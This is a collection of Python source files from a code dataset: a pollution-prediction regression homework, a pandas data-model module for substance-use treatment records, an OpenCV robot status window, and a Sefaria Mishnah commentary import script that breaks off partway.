+{"seq_id":"377339657","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 10 01:23:24 2017\n\n@author: kevin\n\"\"\"\nimport csv \nimport numpy as np\nimport math\n\ndata = []\n# 每一個維度儲存一種污染物的資訊\nfor i in range(18):\n\tdata.append([])\n\nn_row = 0\ntext = open('data/train.csv', 'r', encoding='big5') \nrow = csv.reader(text , delimiter=\",\")\nfor r in row:\n # 第0列沒有資訊\n if n_row != 0:\n # 每一列只有第3-27格有值(1天內24小時的數值)\n for i in range(3,27):\n if r[i] != \"NR\":\n data[(n_row-1)%18].append(float(r[i]))\n else:\n data[(n_row-1)%18].append(float(0))\t\n n_row = n_row + 1\ntext.close()\n\nnumdays = 20\nmonthPeriods = numdays * 24\nsegment = 5\ntimeSeries = monthPeriods - segment\n\nx = []\ny = []\n# 每 12 個月\nfor i in range(12):\n # 一個月取連續10小時的data可以有471筆\n for j in range(timeSeries):\n x.append([])\n # 18種污染物\n for t in range(18):\n # 連續9小時\n for s in range(segment):\n x[timeSeries*i+j].append(data[t][monthPeriods*i+j+s])\n y.append(data[9][monthPeriods*i+j+segment])\ntext.close()\nx = np.array(x)\ny = np.array(y)\n\nprint(x)\n\n# add square term\nx = np.concatenate((x,x**2), axis=1)\n\nx = np.concatenate((np.ones((x.shape[0],1)),x), axis=1)\nw = np.zeros(len(x[0]))\nl_rate = 10\nrepeat = 1300000\nλ = 0.001\nx_t = x.transpose()\ns_gra = np.zeros(len(x[0]))\n\nfor i in range(repeat):\n loss = np.dot(x,w) - y\n RMSE = math.sqrt(np.sum(loss**2) / len(x))\n temp1_w = w[1:]\n temp_w = np.concatenate((np.zeros(1),temp1_w),axis=0)\n gra = np.dot(x_t,loss) + 2 * λ * temp_w \n \n s_gra += gra**2\n ada = np.sqrt(s_gra)\n w = w - l_rate * gra/ada\n print ('iteration: %d | Cost: %f ' % ( i,RMSE))\n \n \n# save model\nnp.save('all_model.npy',w)\n","sub_path":"hw1/hw1_best_trainData.py","file_name":"hw1_best_trainData.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208953218","text":"from dal import *\n\n\ndata_pickle = 'data_model'\nmodel_pickle = 'model'\nx_model = 'X_model'\ny_model = 'Y_model'\n\n\nclass DX:\n\t# get_xy_model(False)\n\t# df = read_pickle(x_model)\n\t# cols = get_cols_alphabetically(df)\n\t#\n\t# for col in cols:\n\t# \tprint('{} = \\'{}\\''.format(col.lower(), col))\n\n\tage_num = 'AGE_NUM'\n\tage_ord = 'AGE_ORD'\n\tambu_vs_residentiel_bin = 'AMBU_VS_RESIDENTIEL_BIN'\n\tcentre_type_txt_cat = 'CENTRE_TYPE_TXT_CAT'\n\tcount_prods_num = 'COUNT_PRODS_NUM'\n\tdate_start_treat_num = 'DATE_START_TREAT_NUM'\n\teducation_level_ord = 'EDUCATION_LEVEL_ORD'\n\texist_main_prod_txt_cat = 'EXIST_MAIN_PROD_TXT_CAT'\n\tfreq_use_ord = 'FREQ_USE_ORD'\n\tinami_patient_proxy_bin = 'INAMI_PATIENT_PROXY_BIN'\n\tincome_stat_salary_proxy_bin = 'INCOME_STAT_SALARY_PROXY_BIN'\n\tincome_stat_txt_cat = 'INCOME_STAT_TXT_CAT'\n\tinjecting_stat_txt_cat = 'INJECTING_STAT_TXT_CAT'\n\tlabour_employed_proxy_bin = 'LABOUR_EMPLOYED_PROXY_BIN'\n\tlabour_interaction_proxy_bin = 'LABOUR_INTERACTION_PROXY_BIN'\n\tlabour_stat_txt_cat = 'LABOUR_STAT_TXT_CAT'\n\tlapse_treatment_firstuse_num = 'LAPSE_TREATMENT_FIRSTUSE_NUM'\n\tlapse_treatment_subst_num = 'LAPSE_TREATMENT_SUBST_NUM'\n\tlvn_children_txt_cat = 'LVN_CHILDREN_TXT_CAT'\n\tlvn_isolated_proxy_bin = 'LVN_ISOLATED_PROXY_BIN'\n\tlvn_stat_where_txt_cat = 'LVN_STAT_WHERE_TXT_CAT'\n\tlvn_stat_with_whom_txt_cat = 'LVN_STAT_WITH_WHOM_TXT_CAT'\n\tmain_prod_alcohol_bin = 'MAIN_PROD_ALCOHOL_BIN'\n\tmain_prod_cannabis_bin = 'MAIN_PROD_CANNABIS_BIN'\n\tmain_prod_cocaine_bin = 'MAIN_PROD_COCAINE_BIN'\n\tmain_prod_hallucinogens_bin = 'MAIN_PROD_HALLUCINOGENS_BIN'\n\tmain_prod_hypnotics_sedatives_bin = 'MAIN_PROD_HYPNOTICS_SEDATIVES_BIN'\n\tmain_prod_opioids_bin = 'MAIN_PROD_OPIOIDS_BIN'\n\tmain_prod_other_bin = 'MAIN_PROD_OTHER_BIN'\n\tmain_prod_stimulants_not_cocaine_bin = 'MAIN_PROD_STIMULANTS_NOT_COCAINE_BIN'\n\tmain_prod_txt_cat = 'MAIN_PROD_TXT_CAT'\n\tmain_prod_type_txt_cat = 'MAIN_PROD_TYPE_TXT_CAT'\n\tmain_prod_volatile_inhalants_bin = 'MAIN_PROD_VOLATILE_INHALANTS_BIN'\n\tniss_patient_proxy_bin = 'NISS_PATIENT_PROXY_BIN'\n\tpat_coded_id = 'PAT_CODED_ID'\n\tprev_treat_txt_cat = 'PREV_TREAT_TXT_CAT'\n\tprod_alcohol_bin = 'PROD_ALCOHOL_BIN'\n\tprod_amphetamines_bin = 'PROD_AMPHETAMINES_BIN'\n\tprod_barbiturates_bin = 'PROD_BARBITURATES_BIN'\n\tprod_benzodiazepines_bin = 'PROD_BENZODIAZEPINES_BIN'\n\tprod_buprenorphine_bin = 'PROD_BUPRENORPHINE_BIN'\n\tprod_cannabis_bin = 'PROD_CANNABIS_BIN'\n\tprod_cocaine_bin = 'PROD_COCAINE_BIN'\n\tprod_crack_bin = 'PROD_CRACK_BIN'\n\tprod_fentanyl_bin = 'PROD_FENTANYL_BIN'\n\tprod_ghb_bin = 'PROD_GHB_BIN'\n\tprod_hallucinogens_bin = 'PROD_HALLUCINOGENS_BIN'\n\tprod_hash_bin = 'PROD_HASH_BIN'\n\tprod_heroin_bin = 'PROD_HEROIN_BIN'\n\tprod_hypnotics_bin = 'PROD_HYPNOTICS_BIN'\n\tprod_ketamine_bin = 'PROD_KETAMINE_BIN'\n\tprod_lsd_bin = 'PROD_LSD_BIN'\n\tprod_marijuana_bin = 'PROD_MARIJUANA_BIN'\n\tprod_mdma_bin = 'PROD_MDMA_BIN'\n\tprod_mephedrone_bin = 'PROD_MEPHEDRONE_BIN'\n\tprod_methadone_bin = 'PROD_METHADONE_BIN'\n\tprod_methamphetamines_bin = 'PROD_METHAMPHETAMINES_BIN'\n\tprod_opiates_bin = 'PROD_OPIATES_BIN'\n\tprod_other_cannabis_bin = 'PROD_OTHER_CANNABIS_BIN'\n\tprod_other_cocaine_bin = 'PROD_OTHER_COCAINE_BIN'\n\tprod_other_hallucinogens_bin = 'PROD_OTHER_HALLUCINOGENS_BIN'\n\tprod_other_hypnotics_bin = 'PROD_OTHER_HYPNOTICS_BIN'\n\tprod_other_opiates_bin = 'PROD_OTHER_OPIATES_BIN'\n\tprod_other_stimulants_bin = 'PROD_OTHER_STIMULANTS_BIN'\n\tprod_other_substance_bin = 'PROD_OTHER_SUBSTANCE_BIN'\n\tprod_powder_cocaine_bin = 'PROD_POWDER_COCAINE_BIN'\n\tprod_stimulants_bin = 'PROD_STIMULANTS_BIN'\n\tprod_volatile_bin = 'PROD_VOLATILE_BIN'\n\tprog_type_txt_cat = 'PROG_TYPE_TXT_CAT'\n\tprovince_txt_cat = 'PROVINCE_TXT_CAT'\n\treferral_txt_cat = 'REFERRAL_TXT_CAT'\n\treg_txt_cat = 'REG_TXT_CAT'\n\troute_admin_txt_cat = 'ROUTE_ADMIN_TXT_CAT'\n\tsex_bin = 'SEX_BIN'\n\tyear_treat_num = 'YEAR_TREAT_NUM'\n\n\nclass DY:\n\t# get_xy_model()\n\t# df = read_pickle(y_model)\n\t#\n\t# cols = get_cols_alphabetically(df)\n\t#\n\t# for col in cols:\n\t# \tprint('{} = \\'{}\\''.format(col.lower(), col))\n\n\tage_first_injection_chk_bin = 'AGE_FIRST_INJECTION_CHK_BIN'\n\tage_first_injection_chk_num = 'AGE_FIRST_INJECTION_CHK_NUM'\n\tage_first_use_chk_bin = 'AGE_FIRST_USE_CHK_BIN'\n\tage_first_use_chk_num = 'AGE_FIRST_USE_CHK_NUM'\n\tage_subst_num = 'AGE_SUBST_NUM'\n\tcentre_commune = 'CENTRE_COMMUNE'\n\tdiagnostic_ord = 'DIAGNOSTIC_ORD'\n\thosp_type_txt_cat = 'HOSP_TYPE_TXT_CAT'\n\tinjecting_stat_txt_cat = 'INJECTING_STAT_TXT_CAT'\n\tlast_inject_txt_cat = 'LAST_INJECT_TXT_CAT'\n\tlast_share_para_txt_cat = 'LAST_SHARE_PARA_TXT_CAT'\n\tlast_share_syringes_txt_cat = 'LAST_SHARE_SYRINGES_TXT_CAT'\n\tshare_para_proxy_bin = 'SHARE_PARA_PROXY_BIN'\n\tshare_syringes_proxy_bin = 'SHARE_SYRINGES_PROXY_BIN'\n\tsubst_treat_txt_cat = 'SUBST_TREAT_TXT_CAT'\n\n\ndef get_cols_w_lookups():\n\t\"\"\"Get columns with list and description details\"\"\"\n\tdf = pd.DataFrame(list(the_cols), columns=[var_used])\n\tdf = df.merge(the_vars, left_on=var_used, right_on=var_name, how='left', copy=False)\n\tdf = df.dropna()\n\treturn df\n\n\ndef get_cols_wo_data():\n\t\"\"\"List the columns with missing data and the percentage it represents\"\"\"\n\ttotal_count = len(the_data)\n\t# -- get count\n\tthe_data_count = pd.DataFrame(the_data.count(), columns=[col_count])\n\t# -- get percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_count] / total_count\n\t# -- sort from worst to best\n\tthe_data_count = the_data_count.sort_values(by=[col_percent_na])\n\t# -- format as percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_percent_na].apply(as_percent)\n\n\tprint(the_data_count[the_data_count[col_count] < total_count])\n\n\ndef get_cols_wo_data_per_year():\n\t\"\"\"list the columns with missing data and the percentage it represents\"\"\"\n\ttotal_count = len(the_data)\n\t# -- get count\n\tthe_data_count = pd.DataFrame(the_data.count(), columns=[col_count])\n\t# -- get percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_count] / total_count\n\t# -- sort from worst to best\n\tthe_data_count = the_data_count.sort_values(by=[col_percent_na])\n\t# -- format as percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_percent_na].apply(as_percent)\n\n\tprint(the_data_count[the_data_count[col_count] < total_count])\n\n\ndef get_response_rate_by_col_per_yr(df):\n\t\"\"\"Get encoding percentage by column\"\"\"\n\tdf = df.groupby([DV.year_treat_num]).count().transpose()\n\tfor col in df.columns:\n\t\t# -- print(col, col_max)\n\t\tcol_max = df[col].max()\n\t\tdf[col] = (df[col] / col_max)\n\n\treturn df\n\n\ndef get_col_response_rate(col, df):\n\tdf = get_response_rate_by_col_per_yr(df)\n\tyr_response_rate = df.ix[col]\n\tprint(yr_response_rate)\n\n\ndef get_best_response_rate_by_col(df):\n\tdf = get_response_rate_by_col_per_yr(df)\n\tdf[col_total] = df.sum(axis=1)\n\tdf = df.sort_values(by=[col_total], ascending=False)\n\tdf = df[df[col_total] == 5]\n\treturn merge_with_vars(df)\n\n\ndef get_worst_response_rate_by_col(df):\n\tdf = get_response_rate_by_col_per_yr(df)\n\tdf[col_total] = df.sum(axis=1)\n\tdf = df.sort_values(by=[col_total])\n\tdf = df[df[col_total] < 5]\n\treturn merge_with_vars(df)\n\n\ndef merge_with_vars(df):\n\tdf[var_used] = df.index\n\tdf = df.merge(the_vars, left_on=var_used, right_on=var_name, how='left', copy=False)\n\tdf = df.drop(col_total, 1)\n\tdf = drop_columns(col_to_drop_from_var_list, df)\n\tdf = df.drop(col_to_drop_from_var_list, 1)\n\treturn df\n\n\ndef get_pivot_by_yrs_indexes_var(col, pivot_rows):\n\t# -- get_col_response_rate(col)\n\t# -- col = 'CD_NATIONALITY_FR'\n\t# -- col = 'CD_REG'\n\tthe_data_pivoted = pd.DataFrame()\n\n\tif len(col) > 3:\n\t\tcol_li_num = left(col, len(col) - 3)\n\t\tif col not in pivot_rows:\n\t\t\tprint(col, col not in pivot_rows)\n\t\t\tif col_li_num in the_cols:\n\t\t\t\tcols = [col_li_num, col]\n\t\t\telse:\n\t\t\t\tcols = [col]\n\n\t\t\tthe_data_cols = the_data[cols + pivot_rows].sort_values(DV.age_fr_ord)\n\t\t\tthe_data_cols[col] = the_data_cols[col].fillna('N/A')\n\n\t\t\t# -- the_data_cols.head(100)\n\t\t\t# -- the_data_cols.shape\n\t\t\t# -- the_data_cols.columns\n\t\t\t# -- type(col_pivots_indexes)\n\t\t\t# -- the_data_cols.columns\n\t\t\t# -- DV.year_treat_num in the_cols\n\n\t\t\tthe_data_pivoted = pd.pivot_table(the_data_cols, index=pivot_rows, columns=cols, aggfunc=len, fill_value=0, margins=True,\n\t\t\t margins_name=col_total)\n\t\t# -- print(the_data_pivoted.head(30))\n\n\t\t# -- tmp_pvt = the_data_pivoted\n\t\t# -- the_data_pivoted.head(10)\n\telse:\n\t\tprint(col)\n\n\treturn the_data_pivoted\n\n\ndef save_data_model():\n\tdf = get_data_model()\n\tsave_as_pickle(df, data_pickle)\n\n\ndef get_data_model():\n\tdf = the_data\n\tget_cols_alphabetically(df)\n\t# get_cols_with_suffix(df, '_CAT')\n\t# df[DV.type_patient_txt_id]\n\n\tdf = remove_col_with_prefix(df, '__')\n\tdf = remove_col_with_prefix(df, 'TX_')\n\tdf = remove_col_with_prefix(df, 'START_TREAT_DATE')\n\tdf = remove_col_with_suffix(df, '_TXT_ORD')\n\tcol_replace_in_name(df, '_TXT_CAT', '_TXT_CAT_TMP')\n\tdf = remove_col_with_suffix(df, '_CAT')\n\tdf = remove_col_with_suffix(df, '_TXT_BIN')\n\tcol_replace_in_name(df, '_TXT_CAT_TMP', '_TXT_CAT')\n\tdf = remove_col_with_prefix(df, 'TYPE_PATIENT_')\n\tdf = remove_col_with_suffix(df, '_CENT_ID')\n\tdf = remove_col_with_suffix(df, 'CENT_REGIST_ID')\n\tdf = remove_col_with_suffix(df, 'PATIENT_ID')\n\tdf = remove_col_with_suffix(df, 'EPISODE_ID')\n\t# df = remove_col_with_suffix(df, 'SITE_ID')\n\tdf = remove_col_with_suffix(df, 'USER_ID')\n\n\treturn df\n\n\ndef get_clean_data_model(from_pickle=True):\n\tif from_pickle:\n\t\tprint(BCOLORS.WARNING + 'from pickle file:', data_pickle + BCOLORS.ENDC)\n\t\tdf = read_pickle(data_pickle)\n\telse:\n\t\tprint(BCOLORS.WARNING + 'from data_info' + BCOLORS.ENDC)\n\t\tdf = get_data_model()\n\t\tdf = reorder_col_alphabetically(df)\n\t\tget_cols_alphabetically(df)\n\t\tsave_as_pickle(df, data_pickle)\n\t\tsave_as_xlsx(df, data_pickle, 5)\n\n\t# get_unique_rows_by_column(df)\n\n\t# -- complete columns with missing data\n\t# ------------------------------------------------------------------------------------\n\tdf[DV.income_stat_txt_cat] = df[DV.income_stat_txt_cat].fillna('Inconnu')\n\tdf[DV.injecting_stat_txt_cat] = df[DV.injecting_stat_txt_cat].fillna('Inconnu')\n\tdf[DV.lvn_children_txt_cat] = df[DV.lvn_children_txt_cat].fillna('Inconnu')\n\tdf[DV.lvn_stat_where_txt_cat] = df[DV.lvn_stat_where_txt_cat].fillna('Inconnu')\n\tdf[DV.lvn_stat_with_whom_txt_cat] = df[DV.lvn_stat_with_whom_txt_cat].fillna('Inconnu')\n\tdf[DV.main_prod_type_txt_cat] = df[DV.main_prod_type_txt_cat].fillna('N/A')\n\tdf[DV.main_prod_txt_cat] = df[DV.main_prod_txt_cat].fillna('N/A')\n\tdf[DV.prev_treat_txt_cat] = df[DV.prev_treat_txt_cat].fillna('Inconnu')\n\tdf[DV.prog_type_txt_cat] = df[DV.prog_type_txt_cat].fillna('Autre')\n\tdf[DV.province_txt_cat] = df[DV.province_txt_cat].fillna('Autre')\n\tdf[DV.prog_type_txt_cat] = df[DV.prog_type_txt_cat].fillna('Autre')\n\tdf[DV.referral_txt_cat] = df[DV.referral_txt_cat].fillna('Inconnu')\n\tdf[DV.reg_txt_cat] = df[DV.reg_txt_cat].fillna('Inconnu')\n\tdf[DV.route_admin_txt_cat] = df[DV.route_admin_txt_cat].fillna('Inconnu')\n\n\t# -- drop remaining missing data row\n\t# ------------------------------------------------------------------------------------\n\tdf = remove_values([-1], DV.age_num, df)\n\tdf = remove_values([0, 99], DV.education_level_ord, df)\n\tdf = remove_values([99], DV.freq_use_ord, df)\n\n\treturn df\n\n\ndef get_xy_model(from_pickle=True):\n\tif from_pickle:\n\t\tprint(BCOLORS.WARNING + 'from pickle file:', data_pickle + BCOLORS.ENDC)\n\t\tdf_X = read_pickle(x_model)\n\t\tdf_Y = read_pickle(y_model)\n\telse:\n\t\tprint(BCOLORS.WARNING + 'from data_info' + BCOLORS.ENDC)\n\n\t\tdf = get_clean_data_model(False)\n\t\tget_cols_alphabetically(df)\n\t\t# cols = get_non_numerical_cols(df)\n\t\t# drop_columns(df, cols)\n\t\tcols_X = [DV.age_num,\n\t\t DV.age_ord,\n\t\t DV.ambu_vs_residentiel_bin,\n\t\t DV.centre_type_txt_cat,\n\t\t DV.count_prods_num,\n\t\t DV.date_start_treat_num,\n\t\t DV.education_level_ord,\n\t\t DV.exist_main_prod_txt_cat,\n\t\t DV.freq_use_ord,\n\t\t DV.inami_patient_proxy_bin,\n\t\t DV.income_stat_txt_cat,\n\t\t DV.income_stat_salary_proxy_bin,\n\t\t DV.injecting_stat_txt_cat,\n\t\t DV.labour_employed_proxy_bin,\n\t\t DV.labour_interaction_proxy_bin,\n\t\t DV.labour_stat_txt_cat,\n\t\t DV.lapse_treatment_firstuse_num,\n\t\t DV.lapse_treatment_subst_num,\n\t\t DV.lvn_children_txt_cat,\n\t\t DV.lvn_stat_where_txt_cat,\n\t\t DV.lvn_stat_with_whom_txt_cat,\n\t\t DV.lvn_isolated_proxy_bin,\n\t\t DV.main_prod_type_txt_cat,\n\t\t DV.main_prod_txt_cat,\n\t\t DV.niss_patient_proxy_bin,\n\t\t DV.prev_treat_txt_cat,\n\t\t DV.pat_coded_id,\n\t\t DV.prog_type_txt_cat,\n\t\t DV.province_txt_cat,\n\t\t DV.referral_txt_cat,\n\t\t DV.reg_txt_cat,\n\t\t DV.route_admin_txt_cat,\n\t\t DV.sex_bin,\n\t\t DV.year_treat_num]\n\n\t\tcol_prods = get_cols_with_prefix_suffix(df, 'PROD_', '_BIN')\n\t\tcol_main_prods = get_cols_with_prefix_suffix(df, 'MAIN_PROD', '_BIN')\n\n\t\tcols_X = cols_X + col_prods + col_main_prods\n\n\t\t# -- Addition use for Y analysis\n\t\tcols_Y = [DV.age_first_use_chk_bin,\n\t\t DV.age_first_use_chk_num,\n\t\t DV.age_first_injection_chk_bin,\n\t\t DV.age_first_injection_chk_num,\n\t\t DV.age_subst_num,\n\t\t DV.centre_commune,\n\t\t DV.diagnostic_ord,\n\t\t DV.hosp_type_txt_cat,\n\t\t DV.injecting_stat_txt_cat,\n\t\t DV.last_inject_txt_cat,\n\t\t DV.last_share_syringes_txt_cat,\n\t\t DV.last_share_para_txt_cat,\n\t\t DV.share_para_proxy_bin,\n\t\t DV.share_syringes_proxy_bin,\n\t\t DV.subst_treat_txt_cat]\n\n\t\tcols_selected = sorted(list(set(cols_X + cols_Y)))\n\t\tdf = df[cols_selected]\n\n\t\tsave_as_pickle(df, model_pickle)\n\n\t\tdf_X = df[cols_X]\n\t\tdf_Y = df[cols_Y]\n\n\t\tsave_as_pickle(df_X, x_model)\n\t\tsave_as_pickle(df_Y, y_model)\n\t\tsave_as_xlsx(df_X, x_model, 5)\n\t\tsave_as_xlsx(df_Y, y_model, 5)\n\n\treturn df_X, df_Y\n\n\n\n\n\n\n\n","sub_path":"model_data.py","file_name":"model_data.py","file_ext":"py","file_size_in_byte":13764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"554226007","text":"#!/usr/bin/env python2.7\nfrom robot import Robot\nimport cv2\nimport numpy as np\nimport time\nfrom behaviours import *\n\n# The window, updated by the Sequencer, that shows the current status & objective of the program\nclass StatusWindow:\n def __init__(self, robot, time_started):\n self.robot = robot\n self.time_started = time_started\n cv2.namedWindow('Status', 1)\n\n def get_time_elapsed(self):\n now = time.time()\n diff = round(now - self.time_started, 2)\n return str(str(diff) + \" seconds\")\n\n def update(self, cycle_count):\n # The blank canvas to show\n image = np.ones([430, 320, 3]) * 255\n sequencer = self.robot.sequencer\n\n # Time-related metrics\n elapsed = ['Elapsed: ' + self.get_time_elapsed()]\n cycles = ['Cycles: ' + str(cycle_count)]\n # Robot current position (from AMCL)\n odom = ['X: ' + str(round(self.robot.pose.px, 2)), 'Y: ' + str(round(self.robot.pose.py, 2))]\n # Current behaviour status\n behaviour = ['Behaviour: ' + sequencer.current_behaviour.name]\n if isinstance(sequencer.current_behaviour, Exploration):\n behaviour = behaviour + [' Towards: (' + str(sequencer.current_behaviour.last_goal_wx) + \", \"\n + str(sequencer.current_behaviour.last_goal_wy) + \")\"]\n elif isinstance(sequencer.current_behaviour, Homing):\n behaviour = behaviour + [' obj_id: ' + str(sequencer.current_behaviour.current_object_id)]\n behaviour = behaviour + [' goal_x: ' + str(sequencer.current_behaviour.target_pose.px)]\n behaviour = behaviour + [' goal_y: ' + str(sequencer.current_behaviour.target_pose.py)]\n behaviour = behaviour + ['Idle: ' + str(self.robot.idle_tracker.idle)]\n\n # Object statuses (whether found, how many times seen and approximated location)\n green_seen_at = self.robot.seen_store.positions[0]\n green_seen_at[0] = round(green_seen_at[0], 3)\n green_seen_at[1] = round(green_seen_at[1], 1)\n red_seen_at = self.robot.seen_store.positions[1]\n red_seen_at[0] = round(red_seen_at[0], 3)\n red_seen_at[1] = round(red_seen_at[1], 1)\n blue_seen_at = self.robot.seen_store.positions[2]\n blue_seen_at[0] = round(blue_seen_at[0], 3)\n blue_seen_at[1] = round(blue_seen_at[1], 1)\n white_seen_at = self.robot.seen_store.positions[3]\n white_seen_at[0] = round(white_seen_at[0], 3)\n white_seen_at[1] = round(white_seen_at[1], 1)\n objects = ['Objects found:',\n ' Green cuboid: ' + str(self.robot.is_object_found(0)),\n ' Seen x' + str(self.robot.get_times_seen(0)),\n ' Seen at (' + str(green_seen_at) + ')',\n ' Red hydrant: ' + str(self.robot.is_object_found(1)),\n ' Seen x' + str(self.robot.get_times_seen(1)),\n ' Seen at (' + str(red_seen_at) + ')',\n ' Blue mailbox: ' + str(self.robot.is_object_found(2)),\n ' Seen x' + str(self.robot.get_times_seen(2)),\n ' Seen at (' + str(blue_seen_at) + ')',\n ' White cube: ' + str(self.robot.is_object_found(3)),\n ' Seen x' + str(self.robot.get_times_seen(3)),\n ' Seen at (' + str(white_seen_at) + ')',]\n\n offset = 18\n x, y = 10, 30\n # Write all of the lines of text we just generated to the blank canvas\n for idx, lbl in enumerate(elapsed + cycles + odom + behaviour + objects):\n cv2.putText(image, str(lbl), (x, y + offset * idx), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 1)\n\n cv2.imshow(\"Status\", image)\n cv2.waitKey(3)\n","sub_path":"scripts/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300035280","text":"import django\n\ndjango.setup()\n\ndjango.setup()\nsuperuser_id = 171118\n# import statistics\nimport csv\nfrom sefaria.model import *\nfrom sefaria.helper.schema import insert_last_child, reorder_children\nfrom sefaria.helper.schema import remove_branch\nfrom sefaria.tracker import modify_bulk_text\nfrom sefaria.helper.category import create_category\nfrom sefaria.system.database import db\nimport time\nimport docx\nfrom docx import Document\nimport re\nimport Levenshtein\n\nseder = \"Moed\"\nmasechtot = [\n\"Berakhot\",\n \"Peah\",\n \"Demai\",\n \"Kilayim\",\n \"Sheviit\",\n \"Terumot\",\n \"Maasrot\",\n \"Maaser Sheni\",\n \"Challah\",\n \"Orlah\",\n \"Bikkurim\"]\n# masechtot = [\"Shabbat\",\n# \"Eruvin\",\n# \"Pesachim\",\n# \"Shekalim\",\n# \"Yoma\",\n# \"Sukkah\",\n# \"Beitzah\",\n# \"Rosh Hashanah\",\n# \"Ta'anit\",\n# \"Megillah\",\n# \"Moed Katan\",\n# \"Chagigah\"\n# ]\n# masechtot = [\"Yevamot\",\n# \"Ketubot\",\n# \"Nedarim\",\n# \"Nazir\",\n# \"Sotah\",\n# \"Gittin\",\n# \"Kiddushin\",\n# ]\n# masechtot = [\n# \"Bava Kamma\",\n# \"Bava Metzia\",\n# \"Bava Batra\",\n# \"Sanhedrin\",\n# \"Makkot\",\n# \"Shevuot\",\n# \"Eduyot\",\n# \"Avodah Zarah\",\n# # \"Pirkei Avot\",\n# \"Horayot\"\n# ]\n# masechtot = [\n# \"Zevachim\",\n# \"Menachot\",\n# \"Chullin\",\n# \"Bekhorot\",\n# \"Arakhin\",\n# \"Temurah\",\n# \"Keritot\",\n# \"Meilah\",\n# \"Tamid\",\n# \"Middot\",\n# \"Kinnim\"\n# ]\n# masechtot = [\n# \"Kelim\",\n# \"Oholot\",\n# \"Negaim\",\n# \"Parah\",\n# \"Tahorot\",\n# \"Mikvaot\",\n# \"Niddah\",\n# \"Makhshirin\",\n# \"Zavim\",\n# \"Tevul Yom\",\n# \"Yadayim\",\n# \"Oktzin\"\n# ]\nmasechtot_he = [\n \"ברכות\",\n \"פאה\",\n \"פאה\",\n \"דמאי\",\n \"כלאים\",\n \"שביעית\",\n \"תרומות\",\n \"מעשרות\",\n \"מעשר שני\",\n \"חלה\",\n \"ערלה\",\n \"ביכורים\"]\n# masechtot_he = [\"שבת\",\n# \"עירובין\",\n# \"פסחים\",\n# \"שקלים\",\n# \"יומא\",\n# \"סוכה\",\n# \"ביצה\",\n# \"ראש השנה\",\n# \"תענית\",\n# \"מגילה\",\n# \"מועד קטן\",\n# \"חגיגה\"]\n# masechtot_he = [\"יבמות\",\n# \"כתובות\",\n# \"נדרים\",\n# \"נזיר\",\n# \"סוטה\",\n# \"גיטין\",\n# \"קידושין\"]\n# masechtot_he = [\n# \"בבא קמא\",\n# \"בבא מציעא\",\n# \"בבא בתרא\",\n# \"סנהדרין\",\n# \"מכות\",\n# \"שבועות\",\n# \"עדיות\",\n# \"עבודה זרה\",\n# # \"אבות\",\n# \"הוריות\"\n# ]\n# masechtot_he = [\n# \"זבחים\",\n# \"מנחות\",\n# \"חולין\",\n# \"בכורות\",\n# \"ערכין\",\n# \"תמורה\",\n# \"כריתות\",\n# \"מעילה\",\n# \"תמיד\",\n# \"מידות\",\n# \"קינים\"\n# ]\n# masechtot_he = [\n# \"כלים\",\n# \"אהלות\",\n# \"נגעים\",\n# \"פרה\",\n# \"טהרות\",\n# \"מקואת\",\n# \"נדה\",\n# \"מכשירין\",\n# \"זבים\",\n# \"טבול יום\",\n# \"ידים\",\n# \"עוקצים\"\n# ]\n\ndef compute_gematria(word):\n # Define the numerical values of each letter\n gematria = {'א': 1, 'ב': 2, 'ג': 3, 'ד': 4, 'ה': 5, 'ו': 6, 'ז': 7, 'ח': 8, 'ט': 9, 'י': 10, 'כ': 20, 'ל': 30, 'מ': 40, 'נ': 50, 'ס': 60, 'ע': 70, 'פ': 80, 'צ': 90, 'ק': 100, 'ר': 200, 'ש': 300, 'ת': 400}\n\n # Compute the Gematria of the word\n total = 0\n for letter in word:\n if letter in gematria:\n total += gematria[letter]\n\n return total\ndef extract_last_word(string):\n # Split the string into words using the whitespace as the delimiter\n words = string.split()\n\n # If there are no words, return an empty string\n if len(words) == 0:\n return \"\"\n\n # Otherwise, return the last word\n return words[-1]\ndef create_fake_schema(en, he):\n root = JaggedArrayNode()\n comm_en = \"Chomat Anakh on {}\".format(en)\n comm_he = u\"חומת אנך על {}\".format(he)\n root.add_primary_titles(comm_en, comm_he)\n root.add_structure([\"Chapter\", \"Paragraph\"])\n index = {\n \"title\": comm_en,\n \"schema\": root.serialize(),\n \"categories\": [\"Tanakh\", \"Commentary\"]\n }\n post_index(index, server=\"http://localhost:8000\")\n\ndef add_new_categories():\n # create_category(['Jewish Thought', 'Guide for the Perplexed'], 'Guide for the Perplexed', \"מורה נבוכים\")\n # create_category(['Jewish Thought', 'Guide for the Perplexed', \"Commentary\"], 'Commentary', \"מפרשים\")\n # create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Zeraim'], 'Seder ' + 'Zeraim')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Moed'], 'Seder ' + 'Moed')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Nashim'], 'Seder ' + 'Nashim')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Kodashim'], 'Seder ' + 'Kodashim')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Tahorot'], 'Seder ' + 'Tahorot')\n\ndef create_text_object(lines):\n text_dict ={}\n\n def ref_generator(masechet_index, perek, mishna, segment):\n return \"Lechem Shamayim on Mishnah \" + masechtot[masechet_index] + \" \" + str(perek) + \" \" + str(mishna) + \":\" + str(segment)\n masechet_index = -1\n perek_index = 0\n mishna_index = 0\n segment_index = 0\n\n\n for line in lines:\n # print(line)\n if \"סליקא מסכת\" in line:\n continue\n if ('@00' in line or '@88' in line) and \"מסכת\" in line:\n masechet_index+=1\n perek_index 